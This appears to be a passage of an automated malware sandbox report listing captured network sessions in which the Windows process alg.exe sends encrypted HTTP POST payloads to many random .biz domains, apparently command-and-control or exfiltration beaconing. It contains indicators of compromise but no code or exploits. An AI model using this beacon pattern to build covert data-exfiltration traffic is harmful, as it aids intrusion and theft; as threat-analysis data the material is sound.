                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:55.195871115 CET778OUTData Raw: b2 bc e2 d1 4c b6 d5 94 fe 02 00 00 13 5a eb cb 49 5a 66 75 8f 04 f7 c7 cd a7 b7 07 cf bc 60 18 fa f2 6e 42 c2 bf b0 6a 05 51 3b 36 bc f7 90 d9 f1 4d 2f a3 09 75 3c 74 1d 93 ad f5 f9 ba 65 64 fb 98 c2 d7 c7 28 87 28 07 a6 6b f0 55 17 af 28 32 18
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: LZIZfu`nBjQ;6M/u<ted((kU(2D "8SjRnMBtncn4.];}q?{H;W|:JRlnfq; zRX_#*#m!IIre$BnY_<M1Y:!Y
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:56.016350031 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=916e6c100105850ae58e2c24e708e55a|155.94.241.187|1731920275|1731920275|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.7 | 50033 | 18.141.10.107 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:56.770996094 CET | 352 | OUT | POST /rbpfcskrc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:56.771013021 CET | 778 | OUT | Data Raw: 52 c3 a1 6a 14 78 d5 12 fe 02 00 00 b3 63 c3 c2 a5 64 0b d9 c6 9f 8f 39 15 0e 10 d6 65 4f 70 eb 20 99 16 38 df 36 d5 28 aa 29 ca 99 4f 71 03 cc 9d 4c 14 25 93 8b e9 d9 dc 44 8b 23 e6 f6 c6 88 20 ea 21 6a 85 7c a7 8f 36 9d ab 7a bd a5 cc 23 e0 5c
Data Ascii: Rjxcd9eOp 86()OqL%D# !j|6z#\Mivx|R&FS|/s}|E*Msh-ZaO}Jv.P,/uup$mV[wj$8wIq}rm%QXjNd&2ZH}i~~_ozd7i">Zsr
Nov 18, 2024 09:57:58.230818033 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f1c76a6b0664e27a5de9579e410d34b5|155.94.241.187|1731920277|1731920277|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.2.7 | 50034 | 82.112.184.197 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:58.566523075 CET | 349 | OUT | POST /bnhm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:57:58.566591978 CET | 842 | OUT | Data Raw: f3 67 ad a5 52 bf 89 ac 3e 03 00 00 bf 44 d9 b4 57 eb 8f 2b 3e eb 07 a2 61 95 46 fc bf 17 8c 38 ae 95 3f 1e be a9 98 5d cf e6 a6 be 1e 2a 4b 5e 3e 0e 15 10 a5 8b 94 17 4d 92 eb db 3b 13 1f 66 d6 37 8f 2e 07 40 97 bc c7 dd 35 8d 94 84 9b 30 89 1f
Data Ascii: gR>DW+>aF8?]*K^>M;f7.@50[|~J(8Z"{i".t@!IpV'=]<s@0\I|P]U4rd*gt@LU1=e`^G uEw$*B^\?X`


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      56192.168.2.75003518.208.156.248805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.763412952 CET355OUTPOST /srhcrhfsmrpwwl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.763495922 CET778OUTData Raw: ed 50 52 f7 77 5b 75 0b fe 02 00 00 3e 34 be ca f3 26 4d 00 f1 66 a1 2c 51 26 11 42 11 08 2e a8 7b 00 ad 02 5c af c0 7c 08 c2 e0 aa 0b 84 75 43 cc 1f 6b c0 28 74 fe 15 53 b2 ae df 89 5c e7 5f e8 31 22 8e 0b f7 a9 70 ca dc ec 11 1a 72 20 22 23 72
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: PRw[u>4&Mf,Q&B.{\|uCk(tS\_1"pr "#rV8i(A@6PGP<-= 8DIa"hF@Exk,Z=j??3C~;9BJP)3|J6GS&o_@(P@dAr*/O%lu]4d
Nov 18, 2024 09:57:59.440339088 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=eb8bf04b0fd134c65ee37f591edb7bd1|155.94.241.187|1731920279|1731920279|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.7 | 50036 | 44.221.84.105 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:59.723517895 CET | 351 | OUT | POST /xjaepin HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:59.723710060 CET | 778 | OUT | Data Raw: c4 03 53 69 89 b0 96 06 fe 02 00 00 69 98 88 13 af 3c 16 7b 00 ac bf cc 18 66 f6 53 0e a5 63 b3 4e b0 4c d1 7b aa 85 17 20 ec 6c 8e 8b 3e 1f cf 1d 88 3b 57 22 71 34 39 76 34 c9 90 8c b0 6c 39 2d 93 0d 3a f1 5d 22 e0 63 7e fe cb fc 86 f1 eb 4b b6
Nov 18, 2024 09:58:00.385080099 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=70467adf0ab0e60165e1306332edfc3d|155.94.241.187|1731920280|1731920280|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.7 | 50037 | 18.141.10.107 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:00.602369070 CET | 354 | OUT | POST /obyashlqvn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:00.602369070 CET | 778 | OUT | Data Raw: 06 40 21 c4 38 33 ee a8 fe 02 00 00 86 64 ca e5 b2 bc 96 75 68 1a 18 aa 0b ba 54 fd d2 13 46 c2 76 38 ca 4e c8 69 ab 5b bc 41 cb 63 aa a4 ff 39 85 c0 20 6f 08 1d 27 fb e8 3f c1 f2 4c 79 fa 97 56 a7 f8 e5 8c cd e5 71 5f d8 01 85 00 bc c1 6a ec aa
Nov 18, 2024 09:58:02.070590019 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=00a26f23c8f0ae2fe55a3302646830ad|155.94.241.187|1731920281|1731920281|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.7 | 50038 | 18.246.231.120 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:02.376399994 CET | 349 | OUT | POST /pwpdijlf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:02.376444101 CET | 778 | OUT | Data Raw: 06 ab 4f dd 2e f9 51 4d fe 02 00 00 2a e6 07 35 2c 02 a9 b9 97 8c 18 2f 96 2e 64 4c 16 a1 b0 8e 07 77 6d c6 4e a7 cd bc b1 ed 20 41 62 10 20 82 da 54 55 f2 80 5a ad de 19 ef 49 9f a6 7a 45 b2 10 28 54 72 3d f0 e3 13 4c 64 7f 16 2f a6 6f 63 80 7a
Nov 18, 2024 09:58:03.199114084 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=80659961ee274932f24a6d809bf30567|155.94.241.187|1731920283|1731920283|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.7 | 50039 | 18.208.156.248 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:03.442679882 CET | 360 | OUT | POST /msvrffxklscfuxyf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:03.442679882 CET | 778 | OUT | Data Raw: ad 5f 58 ee 9d 6a e3 8f fe 02 00 00 c4 90 ed 7d ab bf 4d d3 09 f2 e9 4e 4e 54 b4 85 5a 78 a6 8b 78 e2 97 34 74 f3 2f 61 ff 29 11 85 5a 90 a5 ac 02 c5 5f a4 ed 3e 2a 8c 45 44 68 fa c8 63 45 de 11 50 86 7d 23 4b 5c 03 fc 89 05 fe 10 9e 0a f7 a0 b5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: _Xj}MNNTZxx4t/a)Z_>*EDhcEP}#K\,_s&Cf04/*zFz^`6E5,-k'1v}nKE+g,Vsq6gi{v~f4JGnFRw.IV=_}op`Nap
Nov 18, 2024 09:58:04.096126080 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=523b9646738c5c7c2dba6f6b64e5ec41|155.94.241.187|1731920284|1731920284|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.7 | 50040 | 13.251.16.150 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:04.317079067 CET | 348 | OUT | POST /gvqfad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:04.317114115 CET | 778 | OUT | Data Raw: 53 48 9e 6a 51 aa a5 0e fe 02 00 00 c0 c4 48 0a d0 dc bb d7 24 de ee 82 b4 b1 33 87 d8 45 cd 86 27 94 ee 70 ac 11 78 34 5d 64 9f 94 ed b5 51 9a c1 ac 47 17 c7 23 67 36 a4 0e 10 8a f8 d1 ab 78 d1 04 22 53 d0 0d 5e 34 44 80 2b 2a 86 98 7f 46 ed 82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: SHjQH$3E'px4]dQG#g6x"S^4D+*FVQc?Wj{NiLf&:i!Qjv~UPx0l'GZm;'!X}i-_.Q=zS &bVEs.}(F52z#B
Nov 18, 2024 09:58:05.749259949 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=0d5ec55f2c2380cc58a07723bd77ec1f|155.94.241.187|1731920285|1731920285|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.7 | 50041 | 13.251.16.150 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:05.986740112 CET | 346 | OUT | POST /s HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:05.986783981 CET | 778 | OUT | Data Raw: f2 37 5a cd d1 d9 f8 a5 fe 02 00 00 7b c2 6f 86 d9 aa 4b e1 60 49 20 ca b8 a8 28 b5 80 cd 89 1a 58 77 02 89 93 9e cc 95 fe 56 73 c1 18 a6 a5 d7 b7 ea 4c 8b d8 40 89 9e 09 a8 4e 06 2d a8 c7 36 f7 ca 53 20 90 2f f0 25 ec b5 29 f7 6c d2 6f 8a 4e 26
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 7Z{oK`I (XwVsL@N-6S /%)loN&.9dF}5i~6_/mJE@FO*N*!!o*$P<y3K03vj[4qo)+$[`?U)[x^By>Dmznvn&V3
Nov 18, 2024 09:58:07.438399076 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=fc2ea2439992e67424deb09958762d58|155.94.241.187|1731920287|1731920287|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.2.7 | 50042 | 47.129.31.212 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:07.077781916 CET | 345 | OUT | POST /wj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:07.077796936 CET | 842 | OUT | Data Raw: 92 e0 b9 d1 cb 88 01 7b 3e 03 00 00 06 41 bb 52 59 8d 77 ff 6b 3c 40 ed c8 bf f6 7e 99 fd 04 d0 59 09 ba 2d 66 4b e9 d1 aa 64 69 fd 35 8b a5 fc e5 8a b9 78 de ba 8e 7f ca 00 ff 37 d5 46 43 84 7f 42 fd ad f3 83 ff cc bf 28 5e 72 40 69 2d 71 47 38
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: {>ARYwk<@~Y-fKdi5x7FCB(^r@i-qG8:HL`MO> =O=p|~j(_}`m2bK:Hsrd8\9ZgUQ<#uMYSs3qDmrRkO0aK;ljh7;'!;e%2Mq
Nov 18, 2024 09:58:08.567959070 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=90d5a64ba76e2f5f4137a2cf82288923|155.94.241.187|1731920288|1731920288|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.7 | 50043 | 34.211.97.45 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:07.716058016 CET | 355 | OUT | POST /njcuuhovhvf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:07.717648029 CET | 778 | OUT | Data Raw: 28 81 0d 11 b8 9e 90 3d fe 02 00 00 6d 1f 0e 65 58 60 92 ee d6 78 e5 72 4c ac db 88 23 66 db 26 0f 95 9e 58 50 18 ee 7e 1f 0e d7 f4 5a bd 10 d6 86 3e 94 5a 56 94 90 0c 2b 90 59 dd e6 92 05 cd a0 a1 b5 7f 87 01 8e 75 b9 d7 fa 32 f8 3a a2 91 a6 4e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: (=meX`xrL#f&XP~Z>ZV+Yu2:Nz7RIwkTM\[n|('d_;&H5+0n6\Ct\V'\d+`bg[2utj^"6;\A_PM#\hj$ASh
Nov 18, 2024 09:58:08.553889036 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=791586a4f113248cc519c1ba8b55367e|155.94.241.187|1731920288|1731920288|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.2.7 | 50044 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:08.586793900 CET | 347 | OUT | POST /llwod HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:08.586807013 CET | 842 | OUT | Data Raw: b4 d1 9b cc c1 b7 05 7a 3e 03 00 00 4c bd d3 f2 72 04 47 fe 91 67 1f c5 74 db b5 4c 40 15 fb 51 2f ba 35 8a f5 93 86 b0 fa 62 67 d5 20 ad 70 2d 05 36 40 01 b4 af 34 e3 f6 78 5c 03 92 92 da dd c7 65 ac cc 78 8c b4 76 ec 78 a0 0d 3d 21 a4 2d e0 24
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: z>LrGgtL@Q/5bg p-6@4x\exvx=!-$iL6IN1OJ8u 9J55(#iTUnhp";_7gP*3?mw]0p1ye![0ty[v2MX#JU=\Qk3>sx1lg9y{
Nov 18, 2024 09:58:10.031752110 CET  414                IN         HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
